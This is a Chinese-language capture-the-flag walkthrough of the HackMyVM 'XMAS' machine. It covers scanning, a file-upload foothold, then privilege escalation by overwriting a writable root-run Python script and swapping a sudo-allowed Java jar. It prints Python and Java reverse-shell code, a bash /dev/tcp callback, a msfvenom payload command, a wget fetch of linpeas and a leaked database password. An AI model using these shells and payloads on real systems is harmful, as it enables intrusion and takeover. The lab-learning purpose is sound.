文章

XMAS

XMAS

image-20240402125455811

信息搜集

端口扫描

1
rustscan -a 10.0.2.18 -- -A
1
2
Open 10.0.2.18:22
Open 10.0.2.18:80
1
2
3
4
5
6
7
8
9
10
11
12
13
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 a6:3e:0b:65:85:2c:0c:5e:47:14:a9:dd:aa:d4:8c:60 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBB6Iuk2lt0gUkwd20LjylnFLItynNaqS7OuMGenbc2LNuIbmX/gZGLZtpZvdTiMtV/TQL1bAVcepNp2wlKDcOjw=
|   256 99:72:b5:6e:1a:9e:70:b3:24:e0:59:98:a4:f9:d1:25 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKoXAD4Qu41umJfR110GNdZPV8ldmZ8VSG0OhQyVO+Fw
80/tcp open  http    syn-ack Apache httpd 2.4.55
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://christmas.hmv
|_http-server-header: Apache/2.4.55 (Ubuntu)
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

目录扫描

1
gobuster dir -u http://10.0.2.18/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
1
Error: the server returns a status code that matches the provided options for non existing urls. http://10.0.2.18/96892852-b184-4e22-8560-c544262528af => 301 (Length: 339). To continue please exclude the status code or the length

查看一下网页,会发生跳转:

http://christmas.hmv/

加一个dns:

1
2
# /etc/hosts
10.0.2.18 christmas.hmv

再扫一下:

1
gobuster dir -u http://christmas.hmv/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
1
2
3
4
5
6
7
8
/images               (Status: 301) [Size: 315] [--> http://christmas.hmv/images/]
/uploads              (Status: 301) [Size: 316] [--> http://christmas.hmv/uploads/]
/php                  (Status: 301) [Size: 312] [--> http://christmas.hmv/php/]
/css                  (Status: 301) [Size: 312] [--> http://christmas.hmv/css/]
/js                   (Status: 301) [Size: 311] [--> http://christmas.hmv/js/]
/javascript           (Status: 301) [Size: 319] [--> http://christmas.hmv/javascript/]
/fonts                (Status: 301) [Size: 314] [--> http://christmas.hmv/fonts/]
/server-status        (Status: 403) [Size: 278]

漏洞扫描

1
nikto -h http://10.0.2.18
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          10.0.2.18
+ Target Hostname:    10.0.2.18
+ Target Port:        80
+ Start Time:         2024-04-02 00:56:24 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.55 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Root page / redirects to: http://christmas.hmv
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS).
+ 8102 requests: 0 error(s) and 3 item(s) reported on remote host
+ End Time:           2024-04-02 00:56:36 (GMT-4) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

漏洞挖掘

查看敏感目录

image-20240402131016520

有一个可以查看上传文件的地方,寻找一下有无文件上传的地方:

找到一处问答地方:

image-20240402131402278

1
2
3
4
5
6
7
8
9
10
What was Josephs job? 
Carpenter
How many red nosed reindeers pull Santa's sleigh? 
1
What country did Christmas Trees originate from?
Germany
How does Santa Claus go back up the Chimney to continue his journey of delivering gifts?
He jumps up through the chimney
In the TV series Simpsons, what species is Santas little helper?
Dog

打完无事发生。。。

文件上传反弹shell

找到一个上传点:

image-20240402131921836

image-20240402132259893

image-20240402132325862

wtf?难道弄错了?再来一次:

image-20240402132626059

莫名其妙又有了,连接一下:

image-20240402132718794

提权

信息搜集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
(remote) www-data@xmas:/$ whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
(remote) www-data@xmas:/$ pwd 
/
(remote) www-data@xmas:/$ cd /var/www/html
(remote) www-data@xmas:/var/www/html$ ls -la
total 20
drwxr-xr-x 2 root root  4096 Nov 17 19:20 .
drwxr-xr-x 4 root root  4096 Nov 17 19:59 ..
-rw-r--r-- 1 root root 10671 Nov 17 19:20 index.html
(remote) www-data@xmas:/var/www/html$ cd ../;ls -la
total 16
drwxr-xr-x  4 root root 4096 Nov 17 19:59 .
drwxr-xr-x 14 root root 4096 Nov 17 19:20 ..
drwxr-xr-x  8 root root 4096 Nov 19 21:35 christmas.hmv
drwxr-xr-x  2 root root 4096 Nov 17 19:20 html
(remote) www-data@xmas:/var/www$ cd christmas.hmv/
(remote) www-data@xmas:/var/www/christmas.hmv$ ls -la
total 60
drwxr-xr-x 8 root     root      4096 Nov 19 21:35 .
drwxr-xr-x 4 root     root      4096 Nov 17 19:59 ..
drwxr-xr-x 2 root     root      4096 Nov 17 20:22 css
drwxr-xr-x 2 root     root      4096 Nov 17 20:22 fonts
drwxr-xr-x 2 root     root      4096 Nov 19 16:22 images
-rw-r--r-- 1 root     root     25482 Nov 19 21:26 index.php
drwxr-xr-x 2 root     root      4096 Nov 17 20:22 js
drwxr-xr-x 2 root     root      4096 Nov 17 20:22 php
drwxrwxrwx 2 www-data www-data  4096 Apr  2 05:28 uploads
(remote) www-data@xmas:/var/www/christmas.hmv$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:100:106::/nonexistent:/usr/sbin/nologin
systemd-resolve:x:996:996:systemd Resolver:/:/usr/sbin/nologin
pollinate:x:101:1::/var/cache/pollinate:/bin/false
sshd:x:102:65534::/run/sshd:/usr/sbin/nologin
syslog:x:103:109::/nonexistent:/usr/sbin/nologin
uuidd:x:104:110::/run/uuidd:/usr/sbin/nologin
tcpdump:x:105:111::/nonexistent:/usr/sbin/nologin
tss:x:106:112:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:107:113::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:108:114:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
alabaster:x:1000:1000:Alabaster Snowball:/home/alabaster:/bin/bash
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:109:116:MySQL Server,,,:/nonexistent:/bin/false
santa:x:1001:1001:Santa Claus,,,:/home/santa:/bin/bash
sugurplum:x:1002:1002:Sugurplum Mary,,,:/home/sugurplum:/bin/bash
bushy:x:1003:1003:Bushy Evergreen,,,:/home/bushy:/bin/bash
pepper:x:1004:1004:Pepper Minstix,,,:/home/pepper:/bin/bash
shinny:x:1005:1005:Shinny Upatree,,,:/home/shinny:/bin/bash
wunorse:x:1006:1006:Wunorse Openslae,,,:/home/wunorse:/bin/bash
(remote) www-data@xmas:/var/www/christmas.hmv$ cat /etc/cron*
cat: /etc/cron.d: Is a directory
cat: /etc/cron.daily: Is a directory
cat: /etc/cron.hourly: Is a directory
cat: /etc/cron.monthly: Is a directory
cat: /etc/cron.weekly: Is a directory
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
# You can also override PATH, but by default, newer versions inherit it from the environment
#PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.daily; }
47 6    * * 7   root    test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.weekly; }
52 6    1 * *   root    test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.monthly; }
#
(remote) www-data@xmas:/var/www/christmas.hmv$ cd /script
bash: cd: /script: No such file or directory
(remote) www-data@xmas:/var/www/christmas.hmv$ cd /scripts
bash: cd: /scripts: No such file or directory
(remote) www-data@xmas:/var/www/christmas.hmv$ cd /etc;ls -la
total 960
......(多且没有发现啥)
(remote) www-data@xmas:/etc$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/su
/usr/bin/fusermount3
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/chfn
/usr/libexec/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/snap/snapd/20290/usr/lib/snapd/snap-confine
/snap/snapd/21184/usr/lib/snapd/snap-confine
/snap/core22/1122/usr/bin/chfn
/snap/core22/1122/usr/bin/chsh
/snap/core22/1122/usr/bin/gpasswd
/snap/core22/1122/usr/bin/mount
/snap/core22/1122/usr/bin/newgrp
/snap/core22/1122/usr/bin/passwd
/snap/core22/1122/usr/bin/su
/snap/core22/1122/usr/bin/sudo
/snap/core22/1122/usr/bin/umount
/snap/core22/1122/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core22/1122/usr/lib/openssh/ssh-keysign
/snap/core22/1122/usr/libexec/polkit-agent-helper-1
/snap/core22/864/usr/bin/chfn
/snap/core22/864/usr/bin/chsh
/snap/core22/864/usr/bin/gpasswd
/snap/core22/864/usr/bin/mount
/snap/core22/864/usr/bin/newgrp
/snap/core22/864/usr/bin/passwd
/snap/core22/864/usr/bin/su
/snap/core22/864/usr/bin/sudo
/snap/core22/864/usr/bin/umount
/snap/core22/864/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core22/864/usr/lib/openssh/ssh-keysign
(remote) www-data@xmas:/etc$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
(remote) www-data@xmas:/etc$ cd /opt
(remote) www-data@xmas:/opt$ ls -la
total 12
drwxr-xr-x  3 root root 4096 Nov 20 18:39 .
drwxr-xr-x 20 root root 4096 Nov 17 17:25 ..
drwxr-xr-x  2 root root 4096 Nov 20 18:39 NiceOrNaughty
(remote) www-data@xmas:/opt$ cd NiceOrNaughty/
(remote) www-data@xmas:/opt/NiceOrNaughty$ ls -la
total 12
drwxr-xr-x 2 root root 4096 Nov 20 18:39 .
drwxr-xr-x 3 root root 4096 Nov 20 18:39 ..
-rwxrwxrw- 1 root root 2029 Nov 20 18:39 nice_or_naughty.py
(remote) www-data@xmas:/opt/NiceOrNaughty$ cat nice_or_naughty.py 
import mysql.connector
import random
import os

# Check the wish lists directory
directory = "/var/www/christmas.hmv/uploads"
# Connect to the mysql database christmas
mydb = mysql.connector.connect(
    host="localhost",
    user="root",
    password="ChristmasMustGoOn!",
    database="christmas"
)

#Read the names of the wish list
def read_names(directory):
    for filename in os.listdir(directory):
        full_path = os.path.join(directory, filename)
        if os.path.isfile(full_path):
            name, ext = os.path.splitext(filename)
            if any(char.isalnum() for char in name):
                status = random.choice(["nice", "naughty"])
                #print(f"{name} {status}")
                insert_data(name, status)
                os.remove(full_path)
            else:
                pass
        
        elif os.path.isdir(full_path):
            pass 

# Insert name into the database
def insert_data(name, status):
    mycursor = mydb.cursor()
    sql = "INSERT INTO christmas (name, status) VALUES ( %s, %s)"
    val = (name, status)
    mycursor.execute(sql, val)
    mydb.commit()

#Generate printable Nice and Naughty list
def generate_lists():
    mycursor = mydb.cursor()

    # SQL query to fetch all names and status
    mycursor.execute("SELECT name, status FROM christmas")

    # Separate the nice and naughty lists
    nice_list = []
    naughty_list = []

    for (name, status) in mycursor:
        if status == "nice":
            nice_list.append(name)
        else:
            naughty_list.append(name)
    
    parent_directory = os.path.dirname(os.getcwd())
    file_path = "/home/alabaster/nice_list.txt"
    # Save the nice and naughty lists to separate txt files
    with open(file_path, "w") as file:
        for name in nice_list:
            file.write(f"{name}\n")
    file_path = "/home/alabaster/naughty_list.txt"
    with open(file_path, "w") as file:
        for name in naughty_list:
            file.write(f"{name}\n")

read_names(directory)
generate_lists()

可以看到-rwxrwxrw- 1 root root 2029 Nov 20 18:39 nice_or_naughty.py,是可写的,在里面加入一个反弹shell,我一开始用hack_tools的,但是没成功,又换了一个:

1
echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.2.4",2345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' >/opt/NiceOrNaughty/nice_or_naughty.py

现在就得想办法执行这个脚本,因为是没有定时任务的,所以可能存在某些程序调用方面的,上传一个linpea.sh

1
2
3
4
5
6
# kali
python3 -m http.server 8888
# xmas
wget http://10.0.2.4:8888/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

刚准备回头拿终端去提取一下信息,结果发现shell已经弹回来了:

image-20240402135342940

看来是会定时触发的,我咋没搜集到呢。。

上传一个pspy64看看:

image-20240402140305523

发现定时任务了。。。。。

image-20240402140547914

额。。。。。

提权

信息搜集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
alabaster@xmas:~$ sudo -l
sudo -l
Matching Defaults entries for alabaster on xmas:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User alabaster may run the following commands on xmas:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: /usr/bin/java -jar
        /home/alabaster/PublishList/PublishList.jar
alabaster@xmas:~$ cd /home/alabaster/PublishList/
cd /home/alabaster/PublishList/
alabaster@xmas:~/PublishList$ ls -la
ls -la
total 28
drwxrwxr-x 2 alabaster alabaster 4096 Nov 20 18:45 .
drwxr-x--- 7 alabaster alabaster 4096 Nov 20 18:43 ..
-rw-rw-r-- 1 alabaster alabaster   38 Nov 20 18:45 manifest.mf
-rw-rw-r-- 1 alabaster alabaster   24 Nov 20 18:44 MANIFEST.MF
-rw-rw-r-- 1 alabaster alabaster 1760 Nov 20 18:45 PublishList.class
-rw-rw-r-- 1 alabaster alabaster 1477 Nov 20 18:45 PublishList.jar
-rw-rw-r-- 1 alabaster alabaster 1182 Nov 20 18:44 PublishList.java

发现是可写的,找一下java的反弹shell:

1
2
3
4
5
6
7
8
9
10
public class shell {
    public static void main(String[] args) {
        Process p;
        try {
            p = Runtime.getRuntime().exec("bash -c $@|bash 0 echo bash -i >& /dev/tcp/10.0.2.4/1234 0>&1");
            p.waitFor();
            p.destroy();
        } catch (Exception e) {}
    }
}

可以自己编译一下,再上传,我直接使用msf生成了:

1
2
msfvenom -p java/shell_reverse_tcp LHOST=10.0.2.4 LPORT=1234 -f jar -o shell.jar
python3 -m http.server 8888
1
2
3
4
mv PublishList.jar PublishList.jar.bak
mv shell.jar PublishList.jar
sudo /usr/bin/java -jar /home/alabaster/PublishList/PublishList.jar
# 这里要用绝对路径哦

然后就会弹一个rootshell1234监听端口上面去:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
[02:15:50] Welcome to pwncat 🐈!                                                                                                             __main__.py:164[02:20:14] received connection from 10.0.2.18:39176                                                                                               bind.py:84[02:20:15] 0.0.0.0:1234: upgrading from /usr/bin/dash to /usr/bin/bash                                                                        manager.py:957           10.0.2.18:39176: registered new host w/ db                                                                                         manager.py:957
(local) pwncat$                                                                                                                                             
(remote) root@xmas:/home/alabaster/PublishList# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
(remote) root@xmas:/home/alabaster/PublishList# cd ../;ls -la
total 60
drwxr-x--- 7 alabaster alabaster 4096 Nov 20 18:43 .
drwxr-xr-x 9 root      root      4096 Nov 19 22:29 ..
-rw------- 1 alabaster alabaster  791 Nov 20 19:28 .bash_history
-rw-r--r-- 1 alabaster alabaster  220 Jan  7  2023 .bash_logout
-rw-r--r-- 1 alabaster alabaster 3771 Jan  7  2023 .bashrc
drwx------ 3 alabaster alabaster 4096 Nov 19 11:07 .cache
drwxrwxr-x 4 alabaster alabaster 4096 Nov 19 11:08 .local
-rw-rw-r-- 1 alabaster alabaster   43 Apr  2 05:38 naughty_list.txt
-rw-rw-r-- 1 alabaster alabaster   35 Apr  2 05:38 nice_list.txt
drwxrwxr-x 2 alabaster alabaster 4096 Nov 19 21:50 NiceOrNaughty
-rw-r--r-- 1 alabaster alabaster  807 Jan  7  2023 .profile
drwxrwxr-x 2 alabaster alabaster 4096 Apr  2 06:18 PublishList
-rw-rw-r-- 1 alabaster alabaster   66 Nov 19 21:43 .selected_editor
drwx------ 2 alabaster alabaster 4096 Nov 17 17:32 .ssh
-rw-r--r-- 1 alabaster alabaster    0 Nov 17 17:34 .sudo_as_admin_successful
-rw-rw---- 1 alabaster alabaster  849 Nov 19 09:08 user.txt
(remote) root@xmas:/home/alabaster# cat user.txt
    ||::|:||   .--------,
    |:||:|:|   |_______ /        .-.
    ||::|:|| ."`  ___  `".    {\('v')/}
    \\\/\///:  .'`   `'.  ;____`(   )'___________________________
     \====/ './  o   o  \|~     ^" "^                          //
      \\//   |   ())) .  |   Merry Christmas!                   \
       ||     \ `.__.'  /|                                     //
       ||   _{``-.___.-'\|   Flag: HMV{7bMJ6js7guhQadYDTmBt}    \
       || _." `-.____.-'`|    ___                              //
       ||`        __ \   |___/   \______________________________\
     ."||        (__) \    \|     /
    /   `\/       __   vvvvv'\___/
    |     |      (__)        |
     \___/\                 /
       ||  |     .___.     |
       ||  |       |       |
       ||.-'       |       '-.
       ||          |          )
       ||----------'---------'
(remote) root@xmas:/home/alabaster# cat /root/root.txt
      __,_,_,___)          _______
    (--| | |             (--/    ),_)        ,_) 
       | | |  _ ,_,_        |     |_ ,_ ' , _|_,_,_, _  ,
     __| | | (/_| | (_|     |     | ||  |/_)_| | | |(_|/_)___,
    (      |___,   ,__|     \____)  |__,           |__,

                            |                         _...._
                         \  _  /                    .::o:::::.
                          (\o/)                    .:::'''':o:.
                      ---  / \  ---                :o:_    _:::
                           >*<                     `:}_>()<_{:'
                          >0<@<                 @    `'//\\'`    @ 
                         >>>@<<*              @ #     //  \\     # @
                        >@>*<0<<<           __#_#____/'____'\____#_#__
                       >*>>@<<<@<<         [__________________________]
                      >@>>0<<<*<<@<         |=_- .-/\ /\ /\ /\--. =_-|
                     >*>>0<<@<<<@<<<        |-_= | \ \\ \\ \\ \ |-_=-|
                    >@>>*<<@<>*<<0<*<       |_=-=| / // // // / |_=-_|
      \*/          >0>>*<<@<>0><<*<@<<      |=_- |`-'`-'`-'`-'  |=_=-|
  ___\\U//___     >*>>@><0<<*>>@><*<0<<     | =_-| o          o |_==_| 
  |\\ | | \\|    >@>>0<*<<0>>@<<0<<<*<@<    |=_- | !     (    ! |=-_=|
  | \\| | _(UU)_ >((*))_>0><*<0><@<<<0<*<  _|-,-=| !    ).    ! |-_-=|_
  |\ \| || / //||.*.*.*.|>>@<<*<<@>><0<<@</=-((=_| ! __(:')__ ! |=_==_-\
  |\\_|_|&&_// ||*.*.*.*|_\\db//__     (\_/)-=))-|/^\=^=^^=^=/^\| _=-_-_\
  """"|'.'.'.|~~|.*.*.*|     ____|_   =('.')=//   ,------------.      
      |'.'.'.|   ^^^^^^|____|>>>>>>|  ( ~~~ )/   (((((((())))))))   
      ~~~~~~~~         '""""`------'  `w---w`     `------------'
      Flag HMV{GUbM4sBXzvwf7eC9bNL4}
本文由作者按照 CC BY 4.0 进行授权